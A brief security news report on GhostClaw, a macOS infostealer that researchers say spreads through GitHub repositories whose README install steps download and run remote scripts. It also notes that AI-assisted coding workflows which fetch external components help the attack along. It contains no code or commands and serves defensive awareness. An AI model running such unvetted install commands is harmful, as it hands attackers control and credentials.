GhostClaw, a macOS infostealer discovered by Jamf researchers, is spreading through GitHub repositories by exploiting routine developer install habits. The malware campaign has shifted from npm packages to GitHub repositories and AI-assisted development environments, where it blends into expected behavior rather than exploiting software vulnerabilities.

Developers frequently pull code from GitHub, follow README instructions, and run install commands without hesitation. This familiarity builds trust, allowing GhostClaw to slip directly into established workflows. The malware often appears in seemingly legitimate repositories like SDKs, trading tools, or developer utilities, sometimes remaining unchanged long enough to build credibility before introducing malicious install steps.

GhostClaw doesn't require kernel exploits or obvious break-ins. Instead, it works within permissions users grant, using legitimate system tools to validate entered credentials. Installation instructions often include commands that download and execute remote scripts, giving attackers immediate control. AI-assisted workflows enhance this threat by automatically fetching and running external components, reducing visibility into execution.